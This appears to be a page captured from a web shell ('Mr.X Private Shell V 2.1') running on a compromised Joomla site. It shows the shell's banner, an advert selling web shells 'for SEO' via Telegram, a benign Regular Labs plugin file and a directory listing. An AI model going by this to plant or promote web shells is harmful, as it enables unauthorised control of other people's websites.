__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @package Regular Labs Library * @version 25.6.10828 * * @author Peter van Westen <[email protected]> * @link https://regularlabs.com * @copyright Copyright © 2025 Regular Labs All Rights Reserved * @license GNU General Public License version 2 or later */ namespace RegularLabs\Plugin\System\RegularLabs; defined('_JEXEC') or die; use Joomla\CMS\Factory as JFactory; use RegularLabs\Library\Document as RL_Document; use RegularLabs\Library\Input as RL_Input; class SearchHelper { public static function load() { // Only in frontend search component view if ( ! RL_Document::isClient('site') || RL_Input::getCmd('option') != 'com_search') { return; } $classes = get_declared_classes(); if (in_array('SearchModelSearch', $classes) || in_array('searchmodelsearch', $classes)) { return; } require_once JPATH_LIBRARIES . '/regularlabs/helpers/search.php'; } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| AdminMenu.php | File | 2.61 KB | 0664 |
|
| Application.php | File | 3.01 KB | 0664 |
|
| Params.php | File | 753 B | 0664 |
|
| QuickPage.php | File | 4.47 KB | 0664 |
|
| SearchHelper.php | File | 1.02 KB | 0664 |
|